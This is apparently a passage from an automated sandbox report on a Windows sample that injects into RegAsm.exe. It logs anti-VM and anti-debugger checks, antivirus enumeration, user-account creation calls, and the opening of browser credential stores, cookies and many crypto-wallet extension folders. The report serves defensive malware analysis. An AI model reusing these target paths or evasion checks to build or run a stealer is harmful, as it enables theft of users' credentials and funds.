x8Slot type: PCI Express Gen 2 x16Slot type: PCI Express Gen 3Slot type: PCI Express Gen 3 x1Slot type: PCI Express Gen 3 x2Slot type: PCI Express Gen 3 x4Slot type: PCI Express Gen 3 x8Slot type: PCI Express Gen 3 x16Slot type: UnknownIn Use: YES In Use: NO Name: AcerPackard bell0SNID: Dell0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-Service tag: EnumSystemFirmwareTablesKernel32.dllGetSystemFirmwareTableKernel32.dllSelect Vendor, Name, IdentifyingNumber from Win32_ComputerSystemProductROOT\CIMV2VendorTo be filled Name IdentifyingNumberSelect Manufacturer, Product, SerialNumber, Version from Win32_BaseBoardManufacturerTo be filled Product Version SerialNumberSelect SerialNumber from Win32_BIOSSerialNumberRoot\CIMV2Select * From Win32_PrinterCancelAllJobsReturnValue-ContinueRepair-DesktopWatermarkConfig/UpdateVT-DesktopWatermark-ImmunizeConfig/MRSAPP/apfHKLM\SOFTWARE\Carifred\UVK - Ultra virus killerRebootActionsReset_CHKDSK-RestoreBoot/StopResetApps-StopResetApps/UpdateFromZip/PostUpdateActions\UVKRebootExecLog.txtReset_UDS-ReplaceFile-SReplaceFile-SReplaceFile-ExpandFile-SExpandFile-SExpandFile\UVK_en.exe HKLM\SYSTEM\CurrentControlSet\Control\Session Managerautocheck autochk *BootExecute\cmd.exe /c chkntfs /x \boot.inioperating systems /safeboot:minimal /sos /bootlog /noguiboot /safeboot:network /sos /bootlog /noguibootoperating systems\bcdedit.exe /deletevalue {current} safeboot user...
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | System information queried: FirmwareTableInformation
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Memory allocated: 30E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Memory allocated: 3C20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Memory allocated: 3A30000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | API coverage: 1.0 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6692 | Thread sleep time: -90000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5452 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00ABEB70 PathFileExistsW,FreeLibrary,FreeLibrary,PathFileExistsW,FreeLibrary,FreeLibrary,PathFileExistsW,FindFirstFileW,FindClose,CopyFileW,GetTempPathW,PathFileExistsW,GetSystemDirectoryW,SHDefExtractIconW,GdipCreateBitmapFromHBITMAP,GdipSaveImageToFile,GdipDisposeImage, 0_2_00ABEB70
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00A91560 FindFirstFileW, 0_2_00A91560
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00A91770 FindClose,FindFirstFileW, 0_2_00A91770
                    Source: WyPb2uVZ1P.exe | Binary or memory string: AsyncCreateFileKBMBGBTBPBbytes%I64d %s%.2llf %sdskwipe%lu\\.\%sExtendedUnformatted%ls (0x%02X)FAT12FAT16DELL (spanning)Config/diagnosticsHidden FATHidden NTFSPMagic recoveryHidden NetWareLinux/MINIXSFS/LDM/Linux SwapNovellEZ-DriveOS/2 BMXenixUNIXScramdiskXOSL FSMINIXLinux SwapLinuxHidden LinuxNTFS volume setBSD/OSHibernationBSDMac OS-XNetBSDMac OS-X BootBSDI BSD/386 swapHidden Linux swapVMwareVMware swapLinux RAIDWinNT hidden0x%02XBasic DataUnusedSystemMSFT ReservedLDM MetadataLDM DataMSFT Recovery%c:\\.\%c:\DosDevices\%c:ABCDEFGHIJKLMNOPQRSTUVwXYZ\Device\Harddisk%d\Partition%dError: %ld
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware|VIRTUAL|A M I|Xen
                    Source: RegAsm.exe, 00000003.00000002.2573588665.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Microsoft|VMWare|Virtual
                    Source: WyPb2uVZ1P.exe | Binary or memory string: .?AVQEmulationPaintEngine@@
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00B06246 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B06246
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00AE7E80 FreeLibrary,LoadLibraryW,GetProcAddress, 0_2_00AE7E80
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_03100A77 mov eax, dword ptr fs:[00000030h] 0_2_03100A77
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_03100000 mov edx, dword ptr fs:[00000030h] 0_2_03100000
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_031010C6 mov eax, dword ptr fs:[00000030h] 0_2_031010C6
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_031010C7 mov eax, dword ptr fs:[00000030h] 0_2_031010C7
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_03100E27 mov eax, dword ptr fs:[00000030h] 0_2_03100E27
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00B06246 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B06246
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00ABB880 NetUserAdd,NetUserSetInfo,NetUserSetInfo,LogonUserW,LoadUserProfileW,UnloadUserProfile,NetUserSetInfo,FreeLibrary, 0_2_00ABB880
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00A9DE10 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorOwner,RegSetKeySecurity,LocalFree, 0_2_00A9DE10
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00A9D990 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00A9D990
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00AA5420 GetLocalTime, 0_2_00AA5420
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00A9C910 ConvertStringSidToSidW,LookupAccountNameW,LocalAlloc,LookupAccountNameW, 0_2_00A9C910
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum-LTC
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: lplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"},{"en":"kncchdigobghenbbaddojjnnaogfppfj","ez":"iWlt"},{"en":"kkpllkodjeloidieedojogacfhpaihoh","ez":"EnKrypt"},{"en":"amkmjjmmflddogmhpjloimipb
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000B08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
                    Source: WyPb2uVZ1P.exe, 00000000.00000003.2169346203.0000000006620000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: set_UseMachineKeyStore
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
